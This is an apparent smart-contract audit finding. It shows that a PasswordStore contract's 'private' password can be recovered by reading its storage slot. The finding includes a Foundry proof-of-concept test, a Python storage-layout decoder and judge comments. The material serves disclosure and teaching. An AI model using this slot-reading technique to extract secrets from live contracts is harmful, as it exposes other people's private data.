Severity: high
Valid

Private information should not be stored on the blockchain

Summary

Password will be visible to all.

Vulnerability Details

Although declared as a private variable, the value can be determined by reading the contract's storage slots.

This can be done in Foundry by adding the following functions to the test file:

    function testCanGetPassword() public {
        // Read storage slot 1 of the deployed contract directly, bypassing getPassword()
        bytes32 storedData = vm.load(address(passwordStore), bytes32(uint256(1)));
        // Convert bytes32 to string
        string memory storedPassword = bytes32ToString(storedData);
        console.log(storedPassword);
        // Fetch the password through the owner-only getter for comparison
        vm.prank(owner);
        string memory actualPassword = passwordStore.getPassword();
        console.log(actualPassword);
        assertEq(storedPassword, actualPassword);
    }

    // Copies bytes up to the first zero byte, so it assumes the string is
    // short enough (under 32 bytes) to be stored inline in the slot.
    function bytes32ToString(bytes32 _bytes32) internal pure returns (string memory) {
        uint256 charCount = 0;
        for (uint256 i = 0; i < 32; i++) {
            if (_bytes32[i] != 0) {
                charCount++;
            } else {
                break;
            }
        }
        bytes memory resultBytes = new bytes(charCount);
        for (uint256 i = 0; i < charCount; i++) {
            resultBytes[i] = _bytes32[i];
        }
        return string(resultBytes);
    }

The same method could be applied to a live contract using a forked chain.

Impact

Private information is available to the public.

Tools Used

Foundry

Recommendations

Do not store unencrypted private information on a public blockchain.
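
Why the slot read in the test above yields readable text, as an added example that is not part of the original submission: a Python decoder for the 32-byte word Solidity keeps in a `string` variable's slot, compared with a read-until-zero helper like `bytes32ToString`. The sample words and the value `example-secret` are constructed; `encode_short_string` and `naive_until_zero` are hypothetical helper names.

```python
# Added example: decode the word Solidity stores in a `string` variable's slot.
# Layout: if the lowest bit of the word is 0 the string is "short" (<= 31 bytes),
# its data is left-aligned and the last byte holds length * 2. If the bit is 1
# the word holds length * 2 + 1 and the data lives in consecutive slots starting
# at keccak256(slot), so one slot read is not enough.


def decode_string_slot(word: bytes):
    """Return ("short", text) or ("long", byte_length) for a raw slot word."""
    if len(word) != 32:
        raise ValueError("a storage slot is exactly 32 bytes")
    value = int.from_bytes(word, "big")
    if value & 1:
        return ("long", (value - 1) // 2)
    length = word[31] // 2
    if length > 31:
        raise ValueError("corrupt short-string encoding")
    return ("short", word[:length].decode("utf-8", errors="replace"))


def encode_short_string(text: str) -> bytes:
    """Build the slot word for a short string (used for constructed inputs)."""
    data = text.encode("utf-8")
    if len(data) > 31:
        raise ValueError("only strings of up to 31 bytes fit in one slot")
    return data.ljust(31, b"\x00") + bytes([len(data) * 2])


def naive_until_zero(word: bytes) -> bytes:
    """What a read-until-first-zero-byte helper returns for the same word."""
    return word.split(b"\x00", 1)[0]


if __name__ == "__main__":
    short = encode_short_string("example-secret")   # constructed value
    full = encode_short_string("A" * 31)            # 31-byte edge case
    long_word = (2 * 40 + 1).to_bytes(32, "big")    # marker for a 40-byte string
    for w in (short, full, long_word):
        print(w.hex(), decode_string_slot(w), naive_until_zero(w))
```

For a 31-byte string the read-until-zero approach also picks up the trailing length byte, and for longer strings the slot holds only the length, which is why the layout-aware decoder is the more reliable check when auditing what a contract exposes.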

Updates

Lead Judging Commences

inallhonesty Lead Judge
about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential.
